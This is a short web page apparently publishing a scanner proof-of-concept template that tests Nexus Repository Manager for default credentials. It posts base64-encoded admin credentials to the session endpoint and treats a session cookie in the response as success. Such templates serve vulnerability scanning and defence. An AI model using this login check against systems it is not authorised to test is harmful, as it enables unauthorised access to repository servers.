nexus-default-password: Nexus Default Password

2025-08-01 Nexus Default Password PoC Public

Description

body="Nexus Repository Manager"

PoC

id: nexus-default-password

info:
  name: Nexus Default Password
  author: Soveless
  severity: high
  verified: true
  description: |-
    body="Nexus Repository Manager"
  reference:
    - https://www.tenable.com/plugins/nessus/105244
  tags: default-login,nexus
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /service/rapture/session
      headers:
        X-Nexus-UI: true
      body: username=YWRtaW4%3D&password=YWRtaW4xMjM%3D
    expression: response.status == 204 && response.raw_header.bcontains(b'NXSESSIONID')
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities